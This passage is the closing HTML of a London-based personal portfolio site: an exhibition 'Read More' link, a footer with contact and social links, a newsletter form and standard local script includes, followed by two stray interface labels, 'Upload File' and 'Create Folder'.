fa-comments"></i> <a href="#">12 Comments</a></span> --> </div> </div> </div> <div class="row"> <div class="col"> <a href="exhibition.php?vid=1" class="btn btn-modern btn-light rounded-0 my-2 appear-animation" data-appear-animation="fadeInUpShorter" data-appear-animation-delay="500">Read More</a> </div> </div> </div> </article> <!-- <div class="timeline-date"> <h3 class="text-primary font-weight-bold"><a href="#">Load More...</a></h3> </div> --> </div> </section> </div> </div> </div> </div> </div> <!-- main --> <footer id="footer"> <div class="container"> <div class="footer-ribbon"> <span>Get in Touch</span> </div> <div class="row py-5 mt-4"> <div class="col-md-6 col-lg-4 mb-4 mb-md-0"> <h5 class="text-3 text-dark mb-3">CONTACT ME</h5> <ul class="list list-icons list-icons-lg"> <li class="mb-1"><i class="far fa-dot-circle text-color-primary"></i><p class="m-0">Based in London, available everywhere</p></li> <li class="mb-1"><i class="far fa-envelope text-color-primary"></i><p class="m-0"><a href="mailto:vittoria.c.beltrame@gmail.com" class="text-color-dark opacity-7 ps-1">vittoria.c.beltrame@gmail.com</a></p></li> </ul> </div> <div class="col-md-6 col-lg-3 mb-4 mb-md-0"> <h5 class="text-3 text-dark mb-3">FOLLOW ME</h5> <ul class="footer-social-icons social-icons social-icons-clean social-icons-icon-dark"> <li class="social-icons-instagram"><a href="https://www.instagram.com/vittoria.beltrame/?igshid=YmMyMTA2M2Y%3D" target="_blank" title="Instagram"><i class="fab fa-instagram text-color-primary text-4"></i></a></li> <li class="social-icons-linkedin"><a href="https://uk.linkedin.com/in/vittoria-beltrame-9531a3159" target="_blank" title="Linkedin"><i class="fab fa-linkedin-in text-color-primary text-4"></i></a></li> </ul> </div> <div class="col-md-6 col-lg-5 mb-4 mb-lg-0"> <h5 class="text-3 text-dark mb-3">NEWSLETTER</h5> <p class="pe-1">Keep up on the latest news. Enter your e-mail address and subscribe to the newsletter.</p> <div class="alert alert-success d-none" id="newsletterSuccess"> <strong>Success!</strong> You've been added to our email list. </div> <div class="alert alert-danger d-none" id="newsletterError"></div> <form id="newsletterForm" action="assets/php/newsletter-subscribe.php" method="POST" class="me-4 mb-3 mb-md-0"> <div class="input-group input-group-rounded"> <input class="form-control form-control-sm bg-light" placeholder="Email Address" name="newsletterEmail" id="newsletterEmail" type="email"> <button class="btn text-color-dark suscription-button" type="submit"><strong>SUBSCRIBE!</strong></button> <p class="privacy_acceptance"><span class="importance">*</span>By subscribing to the newsletter you are accepting our <a href="privacy_policy.php">privacy policy</a></p> </div> </form> </div> </div> <div class="text-center pb-3"> <p class="mb-0">© Copyright 2023. | Web by <a href="https://chiarafiorentini.com" target="_blank" class="text-color-dark opacity-7 ps-1">chiara.</a></p> </div> </div> </footer> </div> <!-- body end --> <!-- Vendor --> <script src="assets/vendor/jquery/jquery.min.js"></script> <script src="assets/vendor/jquery.appear/jquery.appear.min.js"></script> <script src="assets/vendor/jquery.easing/jquery.easing.min.js"></script> <script src="assets/vendor/jquery.cookie/jquery.cookie.min.js"></script> <script src="assets/vendor/bootstrap/js/bootstrap.bundle.min.js"></script> <script src="assets/vendor/jquery.validation/jquery.validate.min.js"></script> <script src="assets/vendor/jquery.easy-pie-chart/jquery.easypiechart.min.js"></script> <script src="assets/vendor/jquery.gmap/jquery.gmap.min.js"></script> <script src="assets/vendor/lazysizes/lazysizes.min.js"></script> <script src="assets/vendor/isotope/jquery.isotope.min.js"></script> <script src="assets/vendor/owl.carousel/owl.carousel.min.js"></script> <script src="assets/vendor/magnific-popup/jquery.magnific-popup.min.js"></script> <script src="assets/vendor/vide/jquery.vide.min.js"></script> <script src="assets/vendor/vivus/vivus.min.js"></script> <!-- Theme Base, Components and Settings --> <script src="assets/js/theme.js"></script> <!-- Current Page Vendor and Views --> <script src="assets/js/views/view.contact.js"></script> <!-- Theme Custom --> <script src="assets/js/custom.js"></script> <!-- Theme Initialization Files --> <script src="assets/js/theme.init.js"></script> </body> </html>
Upload File
Create Folder